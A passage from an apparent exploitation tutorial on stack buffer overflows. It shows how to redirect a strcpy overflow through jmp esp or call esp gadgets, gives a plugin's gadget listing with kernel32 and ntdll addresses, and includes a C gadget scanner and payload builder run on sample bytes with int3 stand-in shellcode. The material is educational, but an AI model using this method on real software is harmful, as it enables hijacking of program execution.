In the previous sections we exploited the fact that strcpy never checks the length of the data it copies, and used that to do a variety of things.
However, if the program is loaded dynamically, the stack may not end up at the address we hard-coded into the overwritten return address. The jump then lands in the wrong place and the shellcode does not run.
In that case we want to use something the program already contains to do the jump for us, and the instruction we reach for is jmp esp: when the overflowed function executes ret, ESP points just past the return address, so a jmp esp transfers control to whatever bytes we placed there, no matter where the stack happens to be.
Overwrite the return address with the address of a jmp esp
Use the plugin to search for jmp esp or call esp
0027762F Location found: call esp in [unknown]
00277A0D Location found: call esp in [unknown]
00277A17 Location found: call esp in [unknown]
003010C8 Location found: call esp in [unknown]
00305028 Location found: jmp esp in [unknown]
76D7B543 Location found: call esp in [unknown]
7C8369F0 Location found: call esp in kernel32.text
7C86467B Location found: jmp esp in kernel32.text
7C868667 Location found: call esp in kernel32.text
7C934663 Location found: call esp in ntdll.text
7C97311B Location found: call esp in ntdll.text
7FFA4512 Location found: jmp esp in [unknown]
7FFA54CD Location found: jmp esp in [unknown]
13 addresses found, 0 filtered
We pick one of these as the jump target. Prefer an address inside a module that is always mapped (kernel32 or ntdll here) and whose four bytes contain no 0x00, since strcpy stops copying at the first NUL byte; 7C86467B (jmp esp in kernel32.text) satisfies both. The addresses starting with 00 would cut the copy off right after the return address, before any shellcode is written.
Place the shellcode in the bytes immediately following the overwritten return address.
When the function returns, ESP points to exactly those bytes, so the jmp esp makes the program execute our code.
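The two steps above, searching for the jmp esp / call esp byte patterns and laying out the payload so the shellcode sits where ESP points after ret, as an added example in C. This is not code from the original page or from any plugin; it runs entirely on a constructed byte image and a constructed stand-in for shellcode, the module base address, buffer offset and shellcode bytes are assumed values, and it also applies the strcpy caveat by rejecting any payload that contains a 0x00 byte.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical code bytes standing in for a loaded module (constructed sample). */
static const uint8_t SAMPLE_IMAGE[] = {
    0x90, 0x90,        /* nop; nop       */
    0xFF, 0xE4,        /* jmp esp        */
    0x8B, 0xFF,        /* mov edi, edi   */
    0xFF, 0xD4,        /* call esp       */
    0x54, 0xC3,        /* push esp; ret  */
    0xC3               /* ret            */
};
static const uint32_t SAMPLE_BASE = 0x7C861000u;   /* assumed load address */

/* Shellcode stand-in: int3 breakpoints (constructed, contains no NUL byte). */
static const uint8_t SAMPLE_SHELLCODE[] = { 0xCC, 0xCC, 0xCC, 0xCC };

/* Assumed distance from the start of the overflowed buffer to the saved EIP;
   in practice this is measured by crashing the target with a cyclic pattern. */
#define SAMPLE_EIP_OFFSET 12

/* Byte encodings that redirect execution to the stack pointer. */
static const char *esp_gadget_at(const uint8_t *p)
{
    if (p[0] == 0xFF && p[1] == 0xE4) return "jmp esp";
    if (p[0] == 0xFF && p[1] == 0xD4) return "call esp";
    if (p[0] == 0x54 && p[1] == 0xC3) return "push esp; ret";
    return NULL;
}

/* Scan an image for those encodings (what the search plugin does); returns the count. */
size_t find_esp_gadgets(const uint8_t *img, size_t len, uint32_t base,
                        uint32_t *out_addr, const char **out_name, size_t max_out)
{
    size_t n = 0;
    for (size_t i = 0; i + 1 < len && n < max_out; i++) {
        const char *name = esp_gadget_at(img + i);
        if (name) { out_addr[n] = base + (uint32_t)i; out_name[n] = name; n++; }
    }
    return n;
}

/* strcpy stops at the first 0x00, so the gadget address and the shellcode
   must be NUL-free or the copy ends early. */
int contains_nul(const uint8_t *p, size_t len)
{
    for (size_t i = 0; i < len; i++) if (p[i] == 0) return 1;
    return 0;
}

/* Layout: [padding up to saved EIP][gadget address, little-endian][shellcode].
   After ret pops the gadget address, ESP points at the first shellcode byte.
   Returns the payload length, or 0 if it does not fit or strcpy would cut it. */
size_t build_payload(uint8_t *out, size_t cap, size_t eip_offset, uint32_t gadget,
                     const uint8_t *sc, size_t sc_len)
{
    size_t total = eip_offset + 4 + sc_len;
    if (total > cap) return 0;
    memset(out, 'A', eip_offset);
    out[eip_offset + 0] = (uint8_t)(gadget);
    out[eip_offset + 1] = (uint8_t)(gadget >> 8);
    out[eip_offset + 2] = (uint8_t)(gadget >> 16);
    out[eip_offset + 3] = (uint8_t)(gadget >> 24);
    memcpy(out + eip_offset + 4, sc, sc_len);
    return contains_nul(out, total) ? 0 : total;
}

/* Helpers that run both steps on the constructed sample. */
size_t sample_gadget_count(void)
{
    uint32_t a[8]; const char *n[8];
    return find_esp_gadgets(SAMPLE_IMAGE, sizeof SAMPLE_IMAGE, SAMPLE_BASE, a, n, 8);
}
uint32_t sample_gadget_addr(size_t k)
{
    uint32_t a[8]; const char *n[8];
    size_t cnt = find_esp_gadgets(SAMPLE_IMAGE, sizeof SAMPLE_IMAGE, SAMPLE_BASE, a, n, 8);
    return k < cnt ? a[k] : 0;
}
size_t sample_payload_len(uint32_t gadget)
{
    uint8_t buf[64];
    return build_payload(buf, sizeof buf, SAMPLE_EIP_OFFSET, gadget,
                         SAMPLE_SHELLCODE, sizeof SAMPLE_SHELLCODE);
}
int sample_payload_byte(uint32_t gadget, size_t i)   /* -1 past the end or if rejected */
{
    uint8_t buf[64];
    size_t len = build_payload(buf, sizeof buf, SAMPLE_EIP_OFFSET, gadget,
                               SAMPLE_SHELLCODE, sizeof SAMPLE_SHELLCODE);
    return i < len ? buf[i] : -1;
}

int main(void)
{
    uint32_t a[8]; const char *n[8];
    size_t cnt = find_esp_gadgets(SAMPLE_IMAGE, sizeof SAMPLE_IMAGE, SAMPLE_BASE, a, n, 8);
    for (size_t i = 0; i < cnt; i++)
        printf("%08X Location found: %s in sample\n", a[i], n[i]);
    printf("%zu addresses found\n", cnt);
    printf("payload using first gadget: %zu bytes\n", sample_payload_len(a[0]));
    printf("payload using 0027762F (contains 0x00): %zu bytes\n", sample_payload_len(0x0027762Fu));
    return 0;
}
```

The scanner reports the first jmp esp in the sample at 7C861002; the payload built around it is 12 bytes of padding, the address 02 10 86 7C, then the four int3 bytes. Feeding it an address such as 0027762F from the plugin listing yields 0, because its high byte is 0x00 and strcpy would never copy the shellcode.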
Correspondingly,